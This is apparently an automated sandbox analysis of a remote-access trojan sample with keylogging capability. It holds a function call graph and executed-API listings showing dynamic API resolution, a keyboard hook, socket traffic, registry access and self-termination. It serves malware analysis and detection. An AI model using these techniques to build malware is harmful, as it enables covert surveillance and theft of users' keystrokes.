11 API calls 48298->48300 48299->48288 48300->48299 48302->48299 48304->47829 48306 402347 48305->48306 48307 402252 11 API calls 48306->48307 48308 4023c7 48307->48308 48308->47829 48310 4024f9 48309->48310 48311 40250a 28 API calls 48310->48311 48312 4020b1 48311->48312 48312->47498 48329 43ba8a 48313->48329 48315 43aed0 48335 43a837 36 API calls 3 library calls 48315->48335 48317 43ae95 48317->48315 48318 43aeaa 48317->48318 48328 43aeaf ___std_exception_copy 48317->48328 48334 44062d 20 API calls _Atexit 48318->48334 48321 43aedc 48322 43af0b 48321->48322 48336 43bacf 40 API calls __Tolower 48321->48336 48325 43af77 48322->48325 48337 43ba36 20 API calls 2 library calls 48322->48337 48338 43ba36 20 API calls 2 library calls 48325->48338 48326 43b03e _strftime 48326->48328 48339 44062d 20 API calls _Atexit 48326->48339 48328->47858 48330 43baa2 48329->48330 48331 43ba8f 48329->48331 48330->48317 48340 44062d 20 API calls _Atexit 48331->48340 48333 43ba94 ___std_exception_copy 48333->48317 48334->48328 48335->48321 48336->48321 48337->48325 48338->48326 48339->48328 48340->48333 48347 401fb0 48341->48347 48343 402f1e 48344 402055 11 API calls 48343->48344 48345 402f2d 48344->48345 48345->47872 48346->47875 48348 4025f0 28 API calls 48347->48348 48349 401fbd 48348->48349 48349->48343 48351 40a162 48350->48351 48352 413584 3 API calls 48351->48352 48353 40a169 48352->48353 48354 40a197 48353->48354 48355 40a17d 48353->48355 48371 409097 48354->48371 48357 40a182 48355->48357 48358 409ed6 48355->48358 48360 409097 28 API calls 48357->48360 48358->47550 48362 40a190 48360->48362 48399 40a268 29 API calls 48362->48399 48364 40a195 48364->48358 48365->47901 48535 403222 48366->48535 48368 403022 48539 403262 48368->48539 48372 4090ad 48371->48372 48373 402252 11 API calls 48372->48373 48374 4090c7 48373->48374 48400 404267 48374->48400 48376 4090d5 48377 40a1b4 48376->48377 48412 40b927 48377->48412 48380 40a205 48382 402093 28 API calls 48380->48382 48381 40a1dd 48383 402093 28 API calls 48381->48383 48384 40a210 48382->48384 48385 40a1e7 48383->48385 48386 402093 28 API calls 48384->48386 48387 41bcef 28 API calls 48385->48387 48388 40a21f 48386->48388 48389 40a1f5 48387->48389 48390 41b580 80 API calls 48388->48390 48416 40b19f 31 API calls _Yarn 48389->48416 48393 40a224 CreateThread 48390->48393 48392 40a1fc 48394 401fd8 11 API calls 48392->48394 48395 40a24b CreateThread 48393->48395 48396 40a23f CreateThread 48393->48396 48424 40a2b8 48393->48424 48394->48380 48397 401f09 11 API calls 48395->48397 48421 40a2c4 48395->48421 48396->48395 48418 40a2a2 48396->48418 48398 40a25f 48397->48398 48398->48358 48399->48364 48534 40a2ae 163 API calls 48399->48534 48401 402888 22 API calls 48400->48401 48402 40427b 48401->48402 48403 404290 48402->48403 48404 4042a5 48402->48404 48410 4042df 22 API calls 48403->48410 48405 4027e6 28 API calls 48404->48405 48409 4042a3 48405->48409 48407 404299 48411 402c48 22 API calls 48407->48411 48409->48376 48410->48407 48411->48409 48413 40b930 48412->48413 48414 40a1d2 48412->48414 48417 40b9a7 28 API calls 48413->48417 48414->48380 48414->48381 48416->48392 48417->48414 48427 40a2f3 48418->48427 48444 40ad11 48421->48444 48487 40a761 48424->48487 48428 40a30c GetModuleHandleA SetWindowsHookExA 48427->48428 48429 40a36e GetMessageA 48427->48429 48428->48429 48431 40a328 GetLastError 48428->48431 48430 40a380 TranslateMessage DispatchMessageA 48429->48430 48432 40a2ab 48429->48432 48430->48429 48430->48432 48442 41bc1f 28 API calls 48431->48442 48434 40a339 48443 4052fd 28 API calls 48434->48443 48442->48434 48451 40ad1f 48444->48451 48445 40a2cd 48446 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48447 40b93f 28 API calls 48446->48447 48447->48451 48451->48445 48451->48446 48454 40adbf GetWindowTextW 48451->48454 48472 40add9 48451->48472 48474 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48451->48474 48475 401f86 48451->48475 48479 434801 23 API calls __onexit 48451->48479 48480 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48451->48480 48453 41bb77 GetTickCount 48453->48472 48454->48451 48456 401f09 11 API calls 48456->48472 48457 40b927 28 API calls 48457->48472 48458 40af17 48459 401f09 11 API calls 48458->48459 48459->48445 48460 40ae84 Sleep 48460->48472 48463 402093 28 API calls 48463->48472 48465 409097 28 API calls 48465->48472 48467 406383 28 API calls 48467->48472 48469 403014 28 API calls 48469->48472 48470 40a671 12 API calls 48470->48472 48471 41bcef 28 API calls 48471->48472 48472->48451 48472->48453 48472->48456 48472->48457 48472->48458 48472->48460 48472->48463 48472->48465 48472->48467 48472->48469 48472->48470 48472->48471 48473 401fd8 11 API calls 48472->48473 48481 40907f 28 API calls 48472->48481 48482 40b19f 31 API calls _Yarn 48472->48482 48483 40b9b7 28 API calls 48472->48483 48484 40b783 40 API calls 2 library calls 48472->48484 48485 441ed1 20 API calls 48472->48485 48486 4052fd 28 API calls 48472->48486 48473->48472 48476 401f8e 48475->48476 48477 402252 11 API calls 48476->48477 48478 401f99 48477->48478 48478->48451 48479->48451 48480->48451 48481->48472 48482->48472 48483->48472 48484->48472 48485->48472 48488 40a776 Sleep 48487->48488 48508 40a6b0 48488->48508 48490 40a2c1 48491 40a7c7 GetFileAttributesW 48495 40a788 48491->48495 48492 40a7b6 CreateDirectoryW 48492->48495 48493 40a7de SetFileAttributesW 48493->48495 48495->48488 48495->48490 48495->48491 48495->48492 48495->48493 48497 401e65 22 API calls 48495->48497 48499 40a829 48495->48499 48521 41c482 48495->48521 48496 40a858 PathFileExistsW 48496->48499 48497->48495 48498 4020df 11 API calls 48498->48499 48499->48496 48499->48498 48501 4020b7 28 API calls 48499->48501 48502 40a961 SetFileAttributesW 48499->48502 48503 401fd8 11 API calls 48499->48503 48504 401fe2 28 API calls 48499->48504 48505 406e13 28 API calls 48499->48505 48507 401fd8 11 API calls 48499->48507 48531 41c516 32 API calls 48499->48531 48532 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48499->48532 48501->48499 48502->48495 48503->48499 48504->48499 48505->48499 48507->48495 48509 40a75d 48508->48509 48511 40a6c6 48508->48511 48509->48495 48510 40a6e5 CreateFileW 48510->48511 48512 40a6f3 GetFileSize 48510->48512 48511->48510 48513 40a728 CloseHandle 48511->48513 48514 40a73a 48511->48514 48515 40a716 48511->48515 48516 40a71d Sleep 48511->48516 48512->48511 48512->48513 48513->48511 48514->48509 48518 409097 28 API calls 48514->48518 48533 40b117 84 API calls 48515->48533 48516->48513 48519 40a756 48518->48519 48520 40a1b4 124 API calls 48519->48520 48520->48509 48522 41c495 CreateFileW 48521->48522 48524 41c4d2 48522->48524 48525 41c4ce 48522->48525 48526 41c4f2 WriteFile 48524->48526 48527 41c4d9 SetFilePointer 48524->48527 48525->48495 48529 41c505 48526->48529 48530 41c507 CloseHandle 48526->48530 48527->48526 48528 41c4e9 CloseHandle 48527->48528 48528->48525 48529->48530 48530->48525 48531->48499 48532->48499 48533->48516 48536 40322e 48535->48536 48545 403618 48536->48545 48538 40323b 48538->48368 48540 40326e 48539->48540 48541 402252 11 API calls 48540->48541 48542 403288 48541->48542 48543 402336 11 API calls 48542->48543 48544 403031 48543->48544 48544->47905 48546 403626 48545->48546 48547 403644 48546->48547 48548 40362c 48546->48548 48550 40365c 48547->48550 48551 40369e 48547->48551 48556 4036a6 28 API calls 48548->48556 48554 4027e6 28 API calls 48550->48554 48555 403642 48550->48555 48557 4028a4 22 API calls 48551->48557 48554->48555 48555->48538 48556->48555 48559 404186 48558->48559 48560 402252 11 API calls 48559->48560 48561 404191 48560->48561 48569 4041bc 48561->48569 48564 4042fc 48580 404353 48564->48580 48566 40430a 48567 403262 11 API calls 48566->48567 48568 404319 48567->48568 48568->47913 48570 4041c8 48569->48570 48573 4041d9 48570->48573 48572 40419c 48572->48564 48574 4041e9 48573->48574 48575 404206 48574->48575 48576 4041ef 48574->48576 48577 4027e6 28 API calls 48575->48577 48578 404267 28 API calls 48576->48578 48579 404204 48577->48579 48578->48579 48579->48572 48581 40435f 48580->48581 48584 404371 48581->48584 48583 40436d 48583->48566 48585 40437f 48584->48585 48586 404385 48585->48586 48587 40439e 48585->48587 48650 4034e6 28 API calls 48586->48650 48588 402888 22 API calls 48587->48588 48589 4043a6 48588->48589 48591 404419 48589->48591 48592 4043bf 48589->48592 48651 4028a4 22 API calls 48591->48651 48595 4027e6 28 API calls 48592->48595 48603 40439c 48592->48603 48595->48603 48603->48583 48650->48603 48658 43ab1a 48652->48658 48656 4138f4 48655->48656 48657 4138ca RegSetValueExA RegCloseKey 48655->48657 48656->47929 48657->48656 48661 43aa9b 48658->48661 48660 40170d 48660->47931 48662 43aaaa 48661->48662 48663 43aabe 48661->48663 48667 44062d 20 API calls _Atexit 48662->48667 48666 43aaaf __alldvrm ___std_exception_copy 48663->48666 48668 4489d7 11 API calls 2 library calls 48663->48668 48666->48660 48667->48666 48668->48666 48670 41b98a ctype ___scrt_fastfail 48669->48670 48671 402093 28 API calls 48670->48671 48672 414f84 48671->48672 48672->47938 48673->47955 48675 414f33 48674->48675 48676 414f3d getaddrinfo WSASetLastError 48674->48676 48791 414dc1 29 API calls ___std_exception_copy 48675->48791 48676->47983 48678 414f38 48678->48676 48680 404846 socket 48679->48680 48681 404839 48679->48681 48683 404860 CreateEventW 48680->48683 48684 404842 48680->48684 48792 40489e WSAStartup 48681->48792 48683->47983 48684->47983 48685 40483e 48685->48680 48685->48684 48687 404f65 48686->48687 48688 404fea 48686->48688 48689 404f6e 48687->48689 48690 404fc0 CreateEventA CreateThread 48687->48690 48691 404f7d GetLocalTime 48687->48691 48688->47983 48689->48690 48690->48688 48795 405150 48690->48795 48793 41bc1f 28 API calls 48691->48793 48693 404f91 48794 4052fd 28 API calls 48693->48794 48702 404a1b 48701->48702 48703 4048ee 48701->48703 48704 40497e 48702->48704 48705 404a21 WSAGetLastError 48702->48705 48703->48704 48706 404923 48703->48706 48708 40531e 28 API calls 48703->48708 48704->47983 48705->48704 48707 404a31 48705->48707 48799 420cf1 27 API calls 48706->48799 48709 404932 48707->48709 48710 404a36 48707->48710 48712 40490f 48708->48712 48715 402093 28 API calls 48709->48715 48810 41cb72 30 API calls 48710->48810 48716 402093 28 API calls 48712->48716 48714 40492b 48714->48709 48718 404941 48714->48718 48719 404a80 48715->48719 48720 40491e 48716->48720 48717 404a40 48811 4052fd 28 API calls 48717->48811 48725 404950 48718->48725 48726 404987 48718->48726 48722 402093 28 API calls 48719->48722 48723 41b580 80 API calls 48720->48723 48727 404a8f 48722->48727 48723->48706 48729 402093 28 API calls 48725->48729 48807 421ad1 54 API calls 48726->48807 48730 41b580 80 API calls 48727->48730 48733 40495f 48729->48733 48730->48704 48739 402093 28 API calls 48733->48739 48734 40498f 48736 4049c4 48734->48736 48737 404994 48734->48737 48809 420e97 28 API calls 48736->48809 48740 402093 28 API calls 48737->48740 48742 40496e 48739->48742 48744 4049a3 48740->48744 48745 41b580 80 API calls 48742->48745 48747 402093 28 API calls 48744->48747 48748 404973 48745->48748 48746 4049cc 48749 4049f9 CreateEventW CreateEventW 48746->48749 48751 402093 28 API calls 48746->48751 48750 4049b2 48747->48750 48800 420d31 48748->48800 48749->48704 48752 41b580 80 API calls 48750->48752 48754 4049e2 48751->48754 48755 4049b7 48752->48755 48756 402093 28 API calls 48754->48756 48808 421143 52 API calls 48755->48808 48757 4049f1 48756->48757 48759 41b580 80 API calls 48757->48759 48760 4049f6 48759->48760 48760->48749 48762 404e40 SetEvent CloseHandle 48761->48762 48763 404e57 closesocket 48761->48763 48764 404ed8 48762->48764 48765 404e64 48763->48765 48764->47983 48766 404e73 48765->48766 48767 404e7a 48765->48767 48814 4050e4 84 API calls 48766->48814 48769 404e8c WaitForSingleObject 48767->48769 48770 404ece SetEvent CloseHandle 48767->48770 48771 420d31 3 API calls 48769->48771 48770->48764 48772 404e9b SetEvent WaitForSingleObject 48771->48772 48773 420d31 3 API calls 48772->48773 48774 404eb3 SetEvent CloseHandle CloseHandle 48773->48774 48774->48770 48775->47983 48776->47983 48778->47983 48779->47983 48780->47983 48781->48002 48782->48002 48783->48002 48784->48002 48785->48002 48786->48002 48787->48002 48788->48002 48789->48002 48790->48002 48791->48678 48792->48685 48793->48693 48798 40515c 102 API calls 48795->48798 48797 405159 48798->48797 48799->48714 48801 41e7a2 48800->48801 48802 420d39 48800->48802 48803 41e7b0 48801->48803 48812 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48801->48812 48802->48704 48813 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48803->48813 48806 41e7b7 48807->48734 48808->48748 48809->48746 48810->48717 48812->48803 48813->48806 48814->48767 48816->48050 48817->48076 48818->48075 48819->48064 48820->48068 48821->48074 48822->48104 48827 40f7fd 48825->48827 48826 413584 3 API calls 48826->48827 48827->48826 48828 40f8a1 48827->48828 48830 40f891 Sleep 48827->48830 48847 40f82f 48827->48847 48831 409097 28 API calls 48828->48831 48829 409097 28 API calls 48829->48847 48830->48827 48834 40f8ac 48831->48834 48833 41bcef 28 API calls 48833->48847 48835 41bcef 28 API calls 48834->48835 48836 40f8b8 48835->48836 48860 41384f 14 API calls 48836->48860 48839 40f8cb 48841 401f09 11 API calls 48839->48841 48840 401f09 11 API calls 48840->48847 48843 40f8d7 48841->48843 48842 402093 28 API calls 48842->48847 48844 402093 28 API calls 48843->48844 48845 40f8e8 48844->48845 48848 4137aa 14 API calls 48845->48848 48846 4137aa 14 API calls 48846->48847 48847->48829 48847->48830 48847->48833 48847->48840 48847->48842 48847->48846 48858 40d0d1 112 API calls ___scrt_fastfail 48847->48858 48859 41384f 14 API calls 48847->48859 48849 40f8fb 48848->48849 48861 41288b TerminateProcess WaitForSingleObject 48849->48861 48851 40f903 ExitProcess 48862 412829 62 API calls 48856->48862 48859->48847 48860->48839 48861->48851 48863 42f97e 48864 42f989 48863->48864 48866 42f99d 48864->48866 48867 432f7f 48864->48867 48868 432f8a 48867->48868 48869 432f8e 48867->48869 48868->48866 48871 440f5d 48869->48871 48872 446206 48871->48872 48873 446213 48872->48873 48874 44621e 48872->48874 48884 4461b8 48873->48884 48876 446226 48874->48876 48882 44622f ___crtLCMapStringA 48874->48882 48891 446802 20 API calls _free 48876->48891 48878 446234 48892 44062d 20 API calls _Atexit 48878->48892 48879 446259 HeapReAlloc 48881 44621b 48879->48881 48879->48882 48881->48868 48882->48878 48882->48879 48893 443001 7 API calls 2 library calls 48882->48893 48885 4461f6 48884->48885 48889 4461c6 ___crtLCMapStringA 48884->48889 48895 44062d 20 API calls _Atexit 48885->48895 48887 4461e1 RtlAllocateHeap 48888 4461f4 48887->48888 48887->48889 48888->48881 48889->48885 48889->48887 48894 443001 7 API calls 2 library calls 48889->48894 48891->48881 48892->48881 48893->48882 48894->48889 48895->48888 48896 40165e 48897 401666 48896->48897 48898 401669 48896->48898 48899 4016a8 48898->48899 48901 401696 48898->48901 48900 43455e new 22 API calls 48899->48900 48902 40169c 48900->48902 48903 43455e new 22 API calls 48901->48903 48903->48902 48904 426cdc 48909 426d59 send 48904->48909 48910 41e04e 48911 41e063 ctype ___scrt_fastfail 48910->48911 48923 41e266 48911->48923 48929 432f55 21 API calls _Yarn 48911->48929 48914 41e277 48917 41e21a 48914->48917 48925 432f55 21 API calls _Yarn 48914->48925 48916 41e213 ___scrt_fastfail 48916->48917 48930 432f55 21 API calls _Yarn 48916->48930 48919 41e2b0 ___scrt_fastfail 48919->48917 48926 4335db 48919->48926 48921 41e240 ___scrt_fastfail 48921->48917 48931 432f55 21 API calls _Yarn 48921->48931 48923->48917 48924 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48923->48924 48924->48914 48925->48919 48932 4334fa 48926->48932 48928 4335e3 48928->48917 48929->48916 48930->48921 48931->48923 48933 433509 48932->48933 48934 433513 48932->48934 48933->48928 48934->48933 48938 432f55 21 API calls _Yarn 48934->48938 48936 433534 48936->48933 48939 4338c8 CryptAcquireContextA 48936->48939 48938->48936 48940 4338e9 CryptGenRandom 48939->48940 48942 4338e4 48939->48942 48941 4338fe CryptReleaseContext 48940->48941 48940->48942 48941->48942 48942->48933 48943 426c6d 48949 426d42 recv 48943->48949

                                                  Executed Functions

                                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                  Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1277 40a2f3-40a30a 1278 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1277->1278 1279 40a36e-40a37e GetMessageA 1277->1279 1278->1279 1282 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1278->1282 1280 40a380-40a398 TranslateMessage DispatchMessageA 1279->1280 1281 40a39a 1279->1281 1280->1279 1280->1281 1283 40a39c-40a3a1 1281->1283 1282->1283
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                  Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.3 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-1392497409
                                                  • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1426 404f51-404f5f 1427 404f65-404f6c 1426->1427 1428 404fea 1426->1428 1430 404f74-404f7b 1427->1430 1431 404f6e-404f72 1427->1431 1429 404fec-404ff1 1428->1429 1432 404fc0-404fe8 CreateEventA CreateThread 1430->1432 1433 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1430->1433 1431->1432 1432->1429 1433->1432
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                  • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00DE69C0), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
